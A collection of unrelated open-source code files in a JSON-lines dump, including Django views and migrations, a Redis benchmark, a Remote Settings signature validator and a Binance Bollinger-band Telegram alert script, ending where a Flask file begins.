{"seq_id":"70777013287","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render, redirect\nfrom django.contrib.admin.views.decorators import staff_member_required\n\nfrom .forms import RegisterForm, UpdateUserForm, UpdateCustomerProfileForm, UpdateTrainerProfileForm, AddWorkoutForm, AddWorkoutProgramForm, FitnessDetailsForm, ContactForm\nfrom .models import Workout, WorkoutProgram, User\n\ndef index(request):\n    return render(request, 'workouts/index.html')\n\ndef register(request):\n    if request.method == 'POST':\n        form = RegisterForm(request.POST)\n        if form.is_valid():\n            user = form.save()\n            auth_login(request, user)\n            return redirect('home')\n    else:\n        form = RegisterForm()\n    return render(request, 'workouts/register.html', {'form': form})\n\n@login_required\ndef customer_profile(request):\n    if request.method == 'POST':\n        user_form = UpdateUserForm(request.POST, instance=request.user)\n        customer_profile_form = UpdateCustomerProfileForm(request.POST, request.FILES, instance=request.user.customer_profile)\n\n        if user_form.is_valid() and customer_profile_form.is_valid():\n            
user_form.save()\n customer_profile_form.save()\n messages.success(request, 'Your profile is updated successfully')\n return redirect(to='customer-profile')\n else:\n user_form = UpdateUserForm(instance=request.user)\n customer_profile_form = UpdateCustomerProfileForm(instance=request.user.customer_profile)\n\n return render(request, 'workouts/customer_profile.html', {'user_form': user_form, 'customer_profile_form': customer_profile_form})\n\ndef email_request(request):\n user = request.user\n workout_program = user.customer_profile.program.last()\n\n subject = 'Current Workout Program'\n message = f'Hi {user.first_name}, thank you for working with zoeziAI. Here is your current workout. \\n{workout_program.program}'\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [user.email, ]\n send_mail( subject, message, email_from, recipient_list )\n messages.success(request, 'Email Sent!')\n return redirect(to='customer-profile')\n\n@login_required\n@staff_member_required\ndef trainer_profile(request):\n if request.method == 'POST':\n user_form = UpdateUserForm(request.POST, instance=request.user)\n trainer_profile_form = UpdateTrainerProfileForm(request.POST, request.FILES, instance=request.user.trainer_profile)\n\n if user_form.is_valid() and trainer_profile_form.is_valid():\n user_form.save()\n trainer_profile_form.save()\n messages.success(request, 'Your profile is updated successfully')\n return redirect(to='trainer-profile')\n else:\n user_form = UpdateUserForm(instance=request.user)\n trainer_profile_form = UpdateTrainerProfileForm(instance=request.user.trainer_profile)\n\n return render(request, 'workouts/trainer_profile.html', {'user_form': user_form, 'trainer_profile_form': trainer_profile_form})\n\ndef about_us(request):\n return render(request, 'workouts/about.html')\n\ndef categories(request):\n return render(request, 'workouts/categories.html')\n\ndef contact(request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n\n if form.is_valid():\n form.save()\n messages.success(request, 'Your message has been sent.')\n return redirect(to='contact')\n else:\n form = ContactForm()\n\n return render(request, 'workouts/contact.html', {'form': form})\n\n@login_required\ndef workouts(request):\n workouts = Workout.get_workouts()\n\n if request.method == 'POST':\n form = AddWorkoutForm(request.POST, request.FILES)\n if form.is_valid():\n workout = form.save(commit=False)\n workout.user = request.user\n workout.save()\n messages.success(request, 'Exercise added successfully')\n return redirect(to='workouts')\n else:\n form = AddWorkoutForm()\n\n return render(request, 'workouts/workouts.html', {'form': form, 'workouts': workouts})\n\n@login_required\ndef workout_programs(request):\n all_programs = WorkoutProgram.get_workout_programs()\n\n user_profile = request.user.customer_profile\n body_type = user_profile.body_type.lower()\n experience = user_profile.experience.lower()\n mode = user_profile.training_mode.lower()\n\n search_list = [experience, mode]\n selected_programs = WorkoutProgram.objects.filter(tags__name__in=search_list).distinct()\n\n if request.method == 'POST':\n form = AddWorkoutProgramForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect(to='workout-programs')\n else:\n form = AddWorkoutProgramForm()\n\n return render(request, 'workouts/workout_programs.html', {'programs': all_programs, 'form': form, 'selected_programs': selected_programs})\n\n@login_required\ndef select_workout_program(request, program_id):\n 
request.user.customer_profile.program.add(program_id)\n\n return redirect(to='customer-profile')\n\n@login_required\ndef workout_program_details(request, program_id):\n program = WorkoutProgram.objects.get(id=program_id)\n return render(request, 'workouts/workout_program_details.html', {'program': program})\n\n@login_required\ndef fitness_details(request):\n if request.method == 'POST':\n form = FitnessDetailsForm(request.POST or None, instance=request.user.customer_profile)\n if form.is_valid():\n form.save()\n return redirect(to='workout-programs')\n else:\n form = FitnessDetailsForm(instance=request.user.customer_profile)\n\n return render(request, 'workouts/fitness_details.html', {'form': form})\n\n@login_required\ndef complete_workout(request, program_id):\n request.user.customer_profile.program.remove(program_id)\n\n return redirect(to='customer-profile')\n\n@login_required\n@staff_member_required\ndef reports(request):\n trainers = User.objects.filter(is_trainer=True)\n customers = User.objects.filter(is_customer=True)\n trainers_count = trainers.count()\n customer_count = customers.count()\n workouts_count = Workout.objects.all().count()\n programs_count = WorkoutProgram.objects.all().count()\n\n\n return render(request, 'workouts/reports.html', {\n 'trainers_count': trainers_count,\n 'customers_count': customer_count,\n 'workouts_count': workouts_count,\n 'programs_count': programs_count,\n 'trainers': trainers,\n 'customers': customers,\n })\n","repo_name":"GituMbugua/zoeziAI","sub_path":"workouts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75388832168","text":"import numpy.testing as npt\nimport numpy as np\nimport unittest\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'graphs'))\nfrom complement_graph import ComplementGraph\n\nclass TestComplementGraph(unittest.TestCase):\n \n def setUp(self):\n self.n=4\n self.K_4_list=((0,1),(0,2),(0,3),(1,2),(1,3),(2,3),)\n self.K_4_complement_list=()\n\n def test_k4_iterator(self): \n iterator = ComplementGraph.iterator(self.n,self.K_4_list)\n self.assertEquals(tuple(iterator), self.K_4_complement_list)\n\n def test_empty_iterator(self): \n iterator = ComplementGraph.iterator(self.n,self.K_4_complement_list)\n self.assertEquals(tuple(iterator), self.K_4_list)\n\n# def test_k4_generator(self): \n # empty_list_generator = ComplementGraph.generator(self.n,self.K_4_list)\n # self.assertEquals(empty_list_generator, self.K_4_complement_list)\n\n #def test_empty_generator(self): \n # generator = ComplementGraph.generator(self.n,self.K_4_complement_list)\n #self.assertEquals(generator, self.K_4_list)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jwgwalton/cvxgraph_public","sub_path":"cvxgraph/tests/test_complement_graph.py","file_name":"test_complement_graph.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35490389887","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('profile', '0009_auto_20151110_1423'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DeviceUsage',\n fields=[\n ('id', 
models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('device', models.CharField(max_length=255, choices=[(b'PC', b'PC'), (b'LT', b'Laptop'), (b'TB', b'Tablet'), (b'MF', b'Mobile phone'), (b'WE', b'Wearable')])),\n ('user', models.ForeignKey(related_name='devices', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Influences',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('influence', models.CharField(max_length=255, choices=[(b'PC', b'PC'), (b'LT', b'Laptop'), (b'TB', b'Tablet'), (b'MF', b'Mobile phone'), (b'WE', b'Wearable')])),\n ('user', models.ForeignKey(related_name='influences', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='PlatformUsage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('platform', models.CharField(max_length=255, choices=[(b'MSWIN', b'MS Windows'), (b'OSX', b'OS X'), (b'LINUX', b'Linux'), (b'IOS', b'iOS'), (b'ANDR', b'Android')])),\n ('user', models.ForeignKey(related_name='platforms', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.RemoveField(\n model_name='userprofile',\n name='devices',\n ),\n migrations.RemoveField(\n model_name='userprofile',\n name='influences',\n ),\n migrations.RemoveField(\n model_name='userprofile',\n name='platforms',\n ),\n ]\n","repo_name":"cloudteams/CustomerPlatform","sub_path":"profile/migrations/0010_auto_20151216_1248.py","file_name":"0010_auto_20151216_1248.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"74933293289","text":"\"\"\"type has been added to shtat_department_organizations\n\nRevision ID: c2a2a7a67afe\nRevises: dec0d7fef501\nCreate Date: 2022-09-13 14:40:13.435743\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'c2a2a7a67afe'\ndown_revision = 'dec0d7fef501'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n type_choice_enum = postgresql.ENUM('with_self', 'with_budget', name='typechoice', create_type=False)\n type_choice_enum.create(op.get_bind(), checkfirst=True)\n op.add_column('shtat_department_organizations', sa.Column('type', type_choice_enum, nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('shtat_department_organizations', 'type')\n # ### end Alembic commands ###\n","repo_name":"bakhtiyorovdilshod/shtatka","sub_path":"migrations/versions/c2a2a7a67afe_type_has_been_added_to_shtat_department_.py","file_name":"c2a2a7a67afe_type_has_been_added_to_shtat_department_.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9881463417","text":"import numpy as np\nfrom dagster import asset\nfrom pandas import DataFrame\nfrom scipy.sparse import coo_matrix, csc_matrix, csr_matrix\nfrom sklearn.decomposition import TruncatedSVD\n\nfrom .user_story_matrix import IndexedCooMatrix\n\n\n@asset(io_manager_key=\"warehouse_io_manager\", key_prefix=[\"snowflake\", \"recommender\"])\ndef user_top_recommended_stories(\n context, recommender_model: TruncatedSVD, user_story_matrix: IndexedCooMatrix\n) -> DataFrame:\n \"\"\"The top stories for each commenter (user).\"\"\"\n # Compute XV, which has a row for each user and a column for each component\n XV = recommender_model.transform(user_story_matrix.matrix)\n\n # Now we want to project XV back into story-space. As a dense matrix, the product would be way\n # too big - | # users * # stories|, so we sparsify both the multiplicands to make it more\n # manageable.\n XV[np.abs(XV) < 1] = 0\n sparse_XV = csr_matrix(XV)\n context.log.info(f\"sparse_XV shape: {sparse_XV.shape}\")\n context.log.info(f\"sparse_XV non-zero: {sparse_XV.count_nonzero()}\")\n\n recommender_model.components_[np.abs(recommender_model.components_) < 1e-2] = 0\n sparse_components = csc_matrix(recommender_model.components_)\n context.log.info(f\"recommender_model.components_ shape: {recommender_model.components_.shape}\")\n context.log.info(f\"sparse_components non-zero: {sparse_components.count_nonzero()}\")\n\n # A matrix with the same dimensions as user_story_matrix, but reduced in rank\n X_hat = sparse_XV @ sparse_components\n\n coo = coo_matrix(X_hat)\n story_ids = user_story_matrix.col_index[coo.col].values\n user_ids = user_story_matrix.row_index[coo.row].values\n context.log.info(f\"recommendations: {len(story_ids)}\")\n\n return DataFrame.from_dict({\"user_id\": user_ids, \"story_id\": story_ids, \"relevance\": coo.data})\n","repo_name":"dagster-io/dagster","sub_path":"examples/project_fully_featured/project_fully_featured/assets/recommender/user_top_recommended_stories.py","file_name":"user_top_recommended_stories.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16859439131","text":"n = int(input())\r\nresult = []\r\nfor _ in range(n):\r\n x, y = map(int, input().split())\r\n for i in range(10):\r\n for j in range(10):\r\n result.append((x+i, y+j))\r\n\r\nresult = list(set(result)) # 좌표 중복 제거\r\n \r\nprint(len(result)) # 좌표 하나당 넓이 1로 생각","repo_name":"MHK183/Practice_Algorithms","sub_path":"백준/Silver/2563. 
색종이/색종이.py","file_name":"색종이.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21700524592","text":"import argparse\nimport datetime\nimport itertools\nimport math\nimport sys\nimport tornadis\nimport tornado\nfrom six import print_\nimport six\n\n\ndef get_parameters():\n parser = argparse.ArgumentParser(\n description='Tornadis benchmarking utility', add_help=False)\n parser.add_argument('--help', action='help')\n parser.add_argument('-h', '--hostname',\n help=\"Server hostname (default 127.0.0.1)\",\n default=\"127.0.0.1\")\n parser.add_argument('-p', '--port', help=\"Server port (default 6379)\",\n default=6379)\n parser.add_argument('-u', '--unix_domain_socket',\n help=\"path to a unix socket to connect to (if set \"\n \", overrides host/port parameters)\")\n parser.add_argument('-a', '--password', help=\"Password for Redis Auth\")\n parser.add_argument('-c', '--clients',\n help=\"Number of parallel connections (default 5)\",\n type=int, default=5)\n parser.add_argument('-n', '--requests',\n help=\"Total number of requests (default 100000)\",\n type=int, default=10000)\n parser.add_argument('-b', '--batch-size',\n help=\"Number of request to send in parallel\",\n type=int, default=None)\n parser.add_argument('-P', '--pipeline',\n help=\"Pipeline requests (honnor batch-size if set)\",\n action=\"store_true\")\n parser.add_argument('-d', '--data-size', default=2,\n help=\"Data size of SET/GET value in bytes (default 2)\",\n type=int)\n return parser.parse_args()\n\n\ndef group_iterable(iterable, total_size, group_size):\n processed_size = 0\n while True:\n if processed_size >= total_size:\n return\n else:\n chunk = itertools.islice(iterable, group_size)\n processed_size += group_size\n yield chunk\n\n\nclass Benchmark(object):\n\n def __init__(self, params):\n self.params = params\n self.request_count = self.params.requests\n self.requests_per_client = int(math.ceil(self.params.requests /\n float(self.params.clients)))\n self.response_count = 0\n self.value = '*' * self.params.data_size\n\n @tornado.gen.coroutine\n def multiple_set(self, client_number):\n uds = self.params.unix_domain_socket\n client = tornadis.Client(host=self.params.hostname,\n port=self.params.port,\n unix_domain_socket=uds,\n autoconnect=False,\n tcp_nodelay=True)\n print_(\"Connect client\", client_number)\n yield client.connect()\n print_(\"Client\", client_number, \"connected\")\n futures = (client.call(\"SET\", \"benchmark-key\", self.value)\n for _ in six.moves.range(self.requests_per_client))\n if self.params.batch_size:\n batches = group_iterable(futures, self.requests_per_client,\n self.params.batch_size)\n for batch in itertools.imap(list, batches):\n print_(\"Send {} requests with client {}\".format(len(batch),\n client_number))\n responses = yield batch\n resp_count = len(responses)\n print_(\"Received {} responses \"\n \"with client {}\".format(resp_count, client_number))\n self.response_count += resp_count\n else:\n print_(\"Send {} requests \"\n \"with client {}\".format(self.requests_per_client,\n client_number))\n responses = yield list(futures)\n resp_count = len(responses)\n print_(\"Received {} responses with client {}\".format(resp_count,\n client_number)\n )\n self.response_count += resp_count\n\n @tornado.gen.coroutine\n def _call_pipeline(self, client, pipeline, client_number):\n print_(\"Send {} pipelined requests \"\n \"with client {}\".format(pipeline.number_of_stacked_calls,\n 
client_number))\n responses = yield client.call(pipeline)\n resp_count = len(responses)\n print_(\"Received {} pipelined responses \"\n \"with client {}\".format(resp_count, client_number))\n raise tornado.gen.Return(resp_count)\n\n @tornado.gen.coroutine\n def pipelined_multiple_set(self, client_number):\n uds = self.params.unix_domain_socket\n client = tornadis.Client(host=self.params.hostname,\n port=self.params.port,\n unix_domain_socket=uds,\n autoconnect=False,\n tcp_nodelay=True)\n print_(\"Connect client\", client_number)\n yield client.connect()\n print_(\"Client\", client_number, \"connected\")\n pipeline_size = self.params.batch_size or self.requests_per_client\n print_(pipeline_size)\n pipeline = tornadis.Pipeline()\n for _ in six.moves.range(0, self.requests_per_client):\n pipeline.stack_call(\"SET\", \"benchmark-key\", self.value)\n if pipeline.number_of_stacked_calls >= pipeline_size:\n resp_count = yield self._call_pipeline(client, pipeline,\n client_number)\n self.response_count += resp_count\n pipeline = tornadis.Pipeline()\n if pipeline.number_of_stacked_calls > 0:\n resp_count = yield self._call_pipeline(client, pipeline,\n client_number)\n self.response_count += resp_count\n\n def stop_loop(self, future):\n excep = future.exception()\n if self.response_count == self.request_count:\n loop = tornado.ioloop.IOLoop.instance()\n loop.stop()\n if excep is not None:\n print_(excep)\n raise(excep)\n\n\ndef main():\n params = get_parameters()\n if params.requests % params.clients != 0:\n print_(\"Number of requests must be a multiple \"\n \"of number of clients\", file=sys.stderr)\n sys.exit(-1)\n\n loop = tornado.ioloop.IOLoop.instance()\n benchmark = Benchmark(params)\n print_(\"Max requests per client:\", benchmark.requests_per_client)\n before = datetime.datetime.now()\n for client_number in six.moves.range(params.clients):\n if params.pipeline:\n future = benchmark.pipelined_multiple_set(client_number)\n else:\n future = benchmark.multiple_set(client_number)\n loop.add_future(future, benchmark.stop_loop)\n loop.start()\n after = datetime.datetime.now()\n seconds = (after - before).total_seconds()\n print_(\"{} seconds\".format(seconds))\n print_(\"{} requests per second\".format(int(params.requests / seconds)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"thefab/tornadis","sub_path":"tornadis/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"53"} +{"seq_id":"71860523368","text":"#!/usr/bin/env python3\nimport os\nimport sys\n\nimport gflags\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom common import misc # noqa\nimport run_gossip_experiment # noqa\n\nFLAGS = gflags.FLAGS\n\n# Flags for update mode\ngflags.DEFINE_integer(\"target_update_load\", 500, \"Target update load in queries per second to issue.\")\ngflags.DEFINE_integer(\"update_rps_increment\", 20, \"Increment of requests per second per round for update calls.\")\ngflags.DEFINE_integer(\"update_initial_rps\", 100, \"Start rps and increment in update mode.\")\ngflags.DEFINE_integer(\"max_update_load\", 2000, \"Maximum update load in queries per second to issue.\")\n\n# Duration in seconds for which to execute workload in each round.\ngflags.DEFINE_integer(\"iter_duration\", 300, \"Duration per iteration of the benchmark.\")\n\n# Maximum failure rate and median query duration limit to consider\n# for rps to choose as rps_max. 
If failure rate or latency is higher,\n# continue running the benchmark, but do not consider this RPS\n# for max capacity\ngflags.DEFINE_float(\n \"allowable_failure_rate\", 0.2, \"Maximum failure rate at which to consider the iteration successful.\"\n)\ngflags.DEFINE_integer(\n \"update_allowable_t_median\",\n 30000,\n \"Maximum update median latency in unit of milliseconds at which to consider the iteration successful.\",\n)\n\n# Maximum failure rate and median query duration limit for when to\n# stop the benchmark.\ngflags.DEFINE_float(\"stop_failure_rate\", 0.4, \"Maximum failure rate before aborting the benchmark.\")\ngflags.DEFINE_integer(\n \"stop_t_median\", 60000, \"Maximum median latency in unit of milliseconds before aborting the benchmark.\"\n)\n\nif __name__ == \"__main__\":\n misc.parse_command_line_args()\n exp = run_gossip_experiment.GossipExperiment()\n exp.run_iterations()\n","repo_name":"simond110/ic","sub_path":"scalability/experiments/max_capacity_gossip.py","file_name":"max_capacity_gossip.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12162803998","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nfor _ in range(int(input())):\n try:\n a,b = [int(x) for x in input().split()]\n print(int(a/b))\n except ZeroDivisionError as z:\n print(\"Error Code: integer division or modulo by zero\")\n except ValueError as v:\n print(\"Error Code:\", v)","repo_name":"hamzayn/My_HackerRank_Solutions","sub_path":"Exceptions.py","file_name":"Exceptions.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8093649172","text":"import base64\nimport concurrent.futures\nimport cryptography\nimport hashlib\nimport time\nfrom datetime import datetime\n\nimport cryptography.x509\nimport ecdsa\nimport requests\nfrom cryptography.hazmat.backends import default_backend as crypto_default_backend\nfrom cryptography.hazmat.primitives import serialization as crypto_serialization\nfrom cryptography.x509.oid import NameOID\nfrom kinto_signer.serializer import canonical_json\n\nfrom . 
import PARALLEL_REQUESTS, KintoClient as Client\n\n\nclass ValidationError(Exception):\n pass\n\n\ndef unpem(pem):\n # Join lines and strip -----BEGIN/END PUBLIC KEY----- header/footer\n return b\"\".join(\n [l.strip() for l in pem.split(b\"\\n\") if l and not l.startswith(b\"-----\")]\n )\n\n\ndef timestamp_to_date(timestamp_milliseconds):\n timestamp_seconds = int(timestamp_milliseconds) / 1000\n return datetime.utcfromtimestamp(timestamp_seconds).strftime(\n \"%Y-%m-%d %H:%M:%S UTC\"\n )\n\n\ndef download_collection_data(server_url, collection):\n client = Client(\n server_url=server_url,\n bucket=collection[\"bucket\"],\n collection=collection[\"collection\"],\n )\n endpoint = client.get_endpoint(\"collection\")\n # Collection metadata with cache busting\n metadata = client.get_collection(_expected=collection[\"last_modified\"])[\"data\"]\n # Download records with cache busting\n records = client.get_records(\n _sort=\"-last_modified\", _expected=collection[\"last_modified\"]\n )\n timestamp = client.get_records_timestamp()\n return (collection, endpoint, metadata, records, timestamp)\n\n\ndef validate_signature(event, context, **kwargs):\n \"\"\"Validate the signature of each collection.\n \"\"\"\n server_url = event[\"server\"]\n bucket = event.get(\"bucket\", \"monitor\")\n collection = event.get(\"collection\", \"changes\")\n client = Client(server_url=server_url, bucket=bucket, collection=collection)\n print(\"Read collection list from {}\".format(client.get_endpoint(\"collection\")))\n\n error_messages = []\n\n checked_certificates = {}\n\n collections = client.get_records()\n\n # Grab server data in parallel.\n start_time = time.time()\n collections_data = []\n with concurrent.futures.ThreadPoolExecutor(\n max_workers=PARALLEL_REQUESTS\n ) as executor:\n futures = [\n executor.submit(download_collection_data, server_url, c)\n for c in collections\n ]\n for future in concurrent.futures.as_completed(futures):\n collections_data.append(future.result())\n elapsed_time = time.time() - start_time\n print(f\"Downloaded all data in {elapsed_time:.2f}s\")\n\n for i, (collection, endpoint, metadata, records, timestamp) in enumerate(\n collections_data\n ):\n start_time = time.time()\n\n message = \"{:02d}/{:02d} {}: \".format(i + 1, len(collections), endpoint)\n\n # 1. Serialize\n serialized = canonical_json(records, timestamp)\n data = b\"Content-Signature:\\x00\" + serialized.encode(\"utf-8\")\n\n # 2. Grab the signature\n try:\n signature = metadata[\"signature\"]\n except KeyError:\n # Destination has no signature attribute.\n # Be smart and check if it was just configured.\n # See https://github.com/mozilla-services/remote-settings-lambdas/issues/31\n client = Client(\n server_url=server_url,\n bucket=collection[\"bucket\"],\n collection=collection[\"collection\"],\n )\n with_tombstones = client.get_records(_since=1)\n if len(with_tombstones) == 0:\n # It never contained records. Let's assume it is newly configured.\n message += \"SKIP\"\n print(message)\n continue\n # Some records and empty signature? It will fail below.\n signature = {}\n\n try:\n # 3. Verify the signature with the public key\n pubkey = signature[\"public_key\"].encode(\"utf-8\")\n verifier = ecdsa.VerifyingKey.from_pem(pubkey)\n signature_bytes = base64.urlsafe_b64decode(signature[\"signature\"])\n verified = verifier.verify(signature_bytes, data, hashfunc=hashlib.sha384)\n assert verified, \"Signature verification failed\"\n\n # 4. Verify that the x5u certificate is valid (ie. 
that signature was well refreshed)\n x5u = signature[\"x5u\"]\n if x5u not in checked_certificates:\n resp = requests.get(signature[\"x5u\"])\n cert_pem = resp.text.encode(\"utf-8\")\n cert = cryptography.x509.load_pem_x509_certificate(\n cert_pem, crypto_default_backend()\n )\n assert (\n cert.not_valid_before < datetime.now()\n ), \"certificate not yet valid\"\n assert cert.not_valid_after > datetime.now(), \"certificate expired\"\n subject = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[\n 0\n ].value\n # eg. ``onecrl.content-signature.mozilla.org``, or\n # ``pinning-preload.content-signature.mozilla.org``\n assert subject.endswith(\n \".content-signature.mozilla.org\"\n ), \"invalid subject name\"\n checked_certificates[x5u] = cert\n\n # 5. Check that public key matches the certificate one.\n cert = checked_certificates[x5u]\n cert_pubkey_pem = cert.public_key().public_bytes(\n crypto_serialization.Encoding.PEM,\n crypto_serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n assert (\n unpem(cert_pubkey_pem) == pubkey\n ), \"signature public key does not match certificate\"\n\n elapsed_time = time.time() - start_time\n message += f\"OK ({elapsed_time:.2f}s)\"\n print(message)\n except Exception:\n message += \"⚠ BAD Signature ⚠\"\n print(message)\n\n # Gather details for the global exception that will be raised.\n signed_on = metadata[\"last_modified\"]\n signed_on_date = timestamp_to_date(signed_on)\n timestamp_date = timestamp_to_date(timestamp)\n error_message = (\n \"Signature verification failed on {endpoint}\\n\"\n \" - Signed on: {signed_on} ({signed_on_date})\\n\"\n \" - Records timestamp: {timestamp} ({timestamp_date})\"\n ).format(**locals())\n error_messages.append(error_message)\n\n # Make the lambda to fail in case an exception occured\n if len(error_messages) > 0:\n raise ValidationError(\"\\n\" + \"\\n\\n\".join(error_messages))\n","repo_name":"heyitsarpit/remote-settings-lambdas","sub_path":"commands/validate_signature.py","file_name":"validate_signature.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"7643778848","text":"from dotenv import load_dotenv\nimport os\nimport sys\nfrom module_binance import get_ccxt_bb\nimport telegram\nimport ccxt\nimport pandas as pd\n\n\"\"\"\nBinance/detect_bb_exceed.py\n* Date: 2022. 1. 
30.\n* Author: Jeon Won\n* Func: 바이낸스 차트의 %B 0 값을 상향돌파 또는 1 값을 하향돌파 시 텔레그램 메시지 전송\n* Usage: 15분봉 기준 조사 명령어는 `python3 Binance/detect_bb_exceed.py 15m` (1m, 3m, 5m, 15m, 30m, 1h, 4h, 6h, 12h, 1d 사용)\n\"\"\"\n\nload_dotenv()\n\nINTERVAL = sys.argv[1] # 차트 종류\nTELEGRAM_TOKEN = os.environ.get(\"TELEGRAM_TOKEN\") # 텔레그램 봇 토큰\nTELEGRAM_CHAT_ID = os.environ.get(\"TELEGRAM_CHAT_ID\") # 텔레그램 봇 아이디\nBB_COUNT = 20 # 볼린저 밴드(BB)의 길이\nBB_MULTIPLIER = 2 # 볼린저 밴드(BB)에서 상하한선을 정하기 위해 사용하는 곱(승수)\n\nbot = telegram.Bot(TELEGRAM_TOKEN)\nbinance = ccxt.binance()\ntickers = [\"BTC/USDT\", \"ETH/USDT\", \"XRP/USDT\", \"SOL/USDT\", \"SAND/USDT\", \"BNB/USDT\", \"AXS/USDT\", \"ATOM/USDT\", \"DOGE/USDT\", \"EOS/USDT\", \n \"BCH/USDT\", \"LTC/USDT\", \"ADA/USDT\", \"ETC/USDT\", \"LINK/USDT\", \"TRX/USDT\", \"DOT/USDT\", \"MATIC/USDT\", \"UNI/USDT\", \"ICP/USDT\", \n \"AAVE/USDT\", \"FIL/USDT\", \"XLM/USDT\", \"XTZ/USDT\", \"SUSHI/USDT\", \"THETA/USDT\", \"AVAX/USDT\", \"LUNA/USDT\", \"DASH/USDT\", \"SHIB/USDT\", \n \"XEM/USDT\", \"MANA/USDT\", \"GALA/USDT\", \"DYDX/USDT\", \"CRV/USDT\", \"NEAR/USDT\", \"EGLD/USDT\", \"KSM/USDT\", \"AR/USDT\", \"REN/USDT\", \n \"FTM/USDT\"]\nalert_0_list = [] # %B 0 값 상향돌파 시 텔레그램 메시지 보낼 ticker 리스트\nalert_1_list = [] # %B 1 값 하향돌파 시 텔레그램 메시지 보낼 ticker 리스트\n\n# 각 ticker 조사\nfor ticker in tickers:\n # ccxt로 ticker의 BB_COUNT+1개 만큼의 list를 얻어옴\n # 0 ~ BB_COUNT 범위의 list는 직전 볼린저밴드 계��용\n # 1 ~ BB_COUNT+1 범위의 list는 현재 볼린저밴드 계산용\n ohlcvs = binance.fetch_ohlcv(ticker, INTERVAL, limit=BB_COUNT+1)\n\n prev_ohlcvs = ohlcvs[0:len(ohlcvs)-1] # 직전 기준 BB_COUNT개의 list\n current_ohlcvs = ohlcvs[1:len(ohlcvs)] # 현재 기준 BB_COUNT개의 list\n\n prev_bb = get_ccxt_bb(ticker, prev_ohlcvs, BB_MULTIPLIER) # 직전 기준 볼린저밴드 값\n current_bb = get_ccxt_bb(ticker, current_ohlcvs, BB_MULTIPLIER) # 현재 기준 볼리저밴드 값\n\n prev_per_b = prev_bb[\"per_b\"] # 직전 기준 %B 값\n current_per_b = current_bb[\"per_b\"] # 현재 기준 %B 값\n\n # 직전 -> 현재 %B값이 0을 상향돌파한 ticker를 텔레그램 메시지 보낼 ticker 리스트에 추가\n if(prev_per_b < 0 and current_per_b > 0):\n alert_0_list.append(ticker)\n \n # 직전 -> 현재 %B값이 1을 하향돌파한 ticker를 텔레그램 메시지 보낼 ticker 리스트에 추가\n if(prev_per_b > 1 and current_per_b < 1):\n alert_1_list.append(ticker)\n \n# 텔레그램 메시지 전송\nif alert_0_list:\n message = f\"Binance {INTERVAL} 차트 볼린저밴드 %B 0 상향돌파 Tickers: {alert_0_list}\"\n bot.sendMessage(TELEGRAM_CHAT_ID, text=message)\nif alert_1_list:\n message = f\"Binance {INTERVAL} 차트 볼린저밴드 %B 1 하향돌파 Tickers: {alert_1_list}\"\n bot.sendMessage(TELEGRAM_CHAT_ID, text=message)","repo_name":"jeon-won/crypto-bot-python","sub_path":"Binance/detect_bb_exceed.py","file_name":"detect_bb_exceed.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"504973455","text":"import logging\n\nfrom flask import request\nfrom flask_restplus import Resource\nfrom 